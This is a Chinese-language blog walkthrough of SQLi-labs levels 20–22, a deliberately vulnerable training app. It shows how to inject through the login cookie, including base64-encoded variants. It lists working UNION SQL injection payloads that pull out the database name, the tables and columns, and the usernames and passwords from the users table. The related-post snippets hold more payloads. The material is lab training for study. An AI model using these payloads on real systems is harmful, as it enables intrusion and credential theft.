SQLi-labs(Less-20、Less-21、Less-22)

最新推荐文章于 2023-07-16 14:29:51 发布
最新推荐文章于 2023-07-16 14:29:51 发布
阅读量206 收藏 1
点赞数
分类专栏: 漏洞训练场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41182861/article/details/107727167
版权

Less-20

POST - Cookie injections - Uagent field -error based

  • 基于错误的cookie请求头注入。

  • 首先我们要了解一下cookie的作用,cookie是非常重要的请求头,它是一段文本,常用来表示请求者身份等。通过下面的源代码能够了解到,输入正确用户名和密码登陆后,服务器会将用户名和密码记录在cookie中。那么这样的作用就是下一次客户端只要提交cookie就能登陆。

  • 首先登陆,通过抓包获得cookie:

  • 第一个包
    在这里插入图片描述
    第二个包
    在这里插入图片描述

  • 以Cookie为注入点进行注入:
    在这里插入图片描述

爆库名:
1' union select 1,2,database() #
爆表明:
1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security' #
爆列名:
uname=1' union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users' #
爆数据:
uname=1' union select 1,2,group_concat(username,0x7e,password)from security.users #

在这里插入图片描述

Less-21 Cookie injection- base64 encoded-single qoutes and parenthesis

  • 基于base64编码单引号和括号的Cookie注入。
  • 类似于Less-20,注入点也是在Cookie,注入语句相同。但,闭合方式为单引号小括号:'),并且需要将注入语句进行base64编码。
    在这里插入图片描述

Less-22 Cookie Injection - base64 encoded - double quotes

  • 基于错误的双引号字符型Cookie注入。
  • 类似于Less-21,注入点也是在Cookie,注入语句相同,需要将注入语句进行base64编码。但,闭合方式为双引号"
    在这里插入图片描述
info-sec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-20(cookie注入)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 332
本篇文章使用的环境为sqli-labs Less-20 不懂为什么使用账户admin:admin登陆后页面没有正常返回cookie,所有我使用工具添加了一条cookie信息, 使用burp suite抓取流量包 1、修改cookie值,发现是使用单引号闭合的 此处可以看到页面存在报错信息,可以使用报错注入 2、判断字段数 通过使用order by 进行判断,发现存在3个字段 3、尝试使用联合查询(使用联合查询时,需要使前面的查询语句结果为假),判断当前页面是否有显示位 可以看到当前页面存在显示位置
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs之Less-20和Less-21和Less-22
→_→
04-15 2875
Less-20 基于错误的cookie头部POST注入 首先从已知的条件中我们知道这又是一道“头部注入”,那么我们先输入正确的用户名和密码看一下登录成功是什么样子的: 回显有User-Agent、IP这样从当次Request直接获取的, 也有Cookie这样刷...
sqli-lubs全20关(图文)
rui__rui__的博客
01-18 4702
SQLI-LABS注入前20关(学自B站crow大佬)
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 842
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
sqli-labs (less-20)
kukudeshuo的博客
03-11 301
sqli-labs (less-20) 进入20关,输入用户名和密码后,屏幕回显了我们的USER AGENT、IP地址、cookie信息 通过回显的为cookie信息我们猜测这关注入点很有可能在cookie里,题目提示也告诉我们为cookie注入 这里我们利用火狐的一个小工具来抓取cookie的信息,这个工具的名字为Cookies Manager +,我们打开来查看当前页面的cookie信息 我们输入’试试 屏幕回显报错 根据报错信息判断闭合方式为’#,并且为字符型注入 判断字段长度 判断字段
SQLi LABS Less-20
热门推荐
wangyuxiang946的博客
06-23 1万+
第二十关请求方式为POST请求 , 注入点为 单引号字符串型, 注入方式为 联合注入 通过 cookie 注入 第一步,判断注入方式 先看源码 账号和密码对特殊字符进行过滤 , 固 不能使用常规注入 登录成功会保存 cookie , 有一个根据cookie中的用户名查询的SQL 并且从cookie中获取的用户名没有过滤 , 同时查询的结果会展示在页面中 , 我们可以通过修改 cookie中 uname的内容 进行联合注入 ...
Less-20
m0_62094846的博客
03-31 811
只能用cookie传参,如果用POST传参,就会提示用cookie,无论cookie中输入什么都是这样 uname=1'# uname=1' order by 3# uname=1' order by 2# 都不会有任何回显,但是4就会报错,也只会报错 但是select的时候又直接回显了,不知道为什么order by 1和2的时候不报错 uname=1' union select 1,2,3# 所以按照正常的查就可以了 uname=1' union select d...
Less 20 (cookie注入)
老司机开代码的博客
08-03 353
文章目录1. 题目分析2. 思路3. 注入手法3.1 更改本地cookie3.2 抓包更改cookie 1. 题目分析 首页是一个登录框,登录成功后,可以看到如下界面: 这里记录了很多请求头信息。接着看一下网站源码: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="ht
less12-less20()
qq_36567469的博客
03-20 3992
总结 user_agent注入 referer注入 cookie注入 updatexml()报错注入 less12 用户名密码输入 a") or ("1"="1 得到一个账户Dumb、Dumb。 用户名密码处分别输入计算出行数 Dumb") and ("1"="1 Dumb") and 1=1 order by 2-- 输入 Dumb") and ("1"="2 Dumb") and 1=2 union select 1,2-- 输入 Dumb") and ("1"="2 Dumb") and 1
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
安装sqli-labs
10-22
安装sqli-labs
sqli-labs靶场练习Less-21~30(持续更新)--ch4nge
ch4nge
10-28 732
Less21-30 作者:ch4nge 目录Less21-30Less21·cookie·E·base64encode手注sqlmapLess 22·cookie·E·base64encode手注sqlmapLess 23·Less 24·二次注入 Less21·cookie·E·base64encode Base64encode之后注入 注入操作同20 登录框没有注入点 setcookie('uname', base64_encode($row1['username']), time()+3600);
sqli-labs-less-12 PODT传参+有回显信息(图文详解)
yzcn
11-02 427
Less-12 post传递参数 由于是post传参,我们先用burp-suite抓包,分析报文体,获取传参过程。 得到报文体之后使用hackbar插件中的post data进行注入实验 判断闭合方式: uname=’ or 1=1 #&passwd=&submit=Submit 登录失败 uname=") or 1=1 #&passwd=&submit=Submit 登录成功,在这里可以得知存在注入点,闭合方式为(“”) 使用order by判断字段列数: uname
SQLI-LABS Less-20 到 Less-22
Web学习之路
03-24 129
Cookie注入
sqli-labs (less20-less22)
Xi4or0uji
08-01 976
less 20 cookie注入 这关首先看源码可以看见首次登录,后台会把username放去cookie,再次登录的时候,如果cookie没过期,就会去cookie里面取值,然后进行查询,至于sql语句就是 所以我们只要去改掉他的cookie就可以拿到数据库的东西了 最后改出来是上面那个,为什么这样写呢,sql查询语句如果前面为空,就会将后面查出来的信息给出来 因为源码后面是将...
typora.zip
最新发布
06-03
typora.zip
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值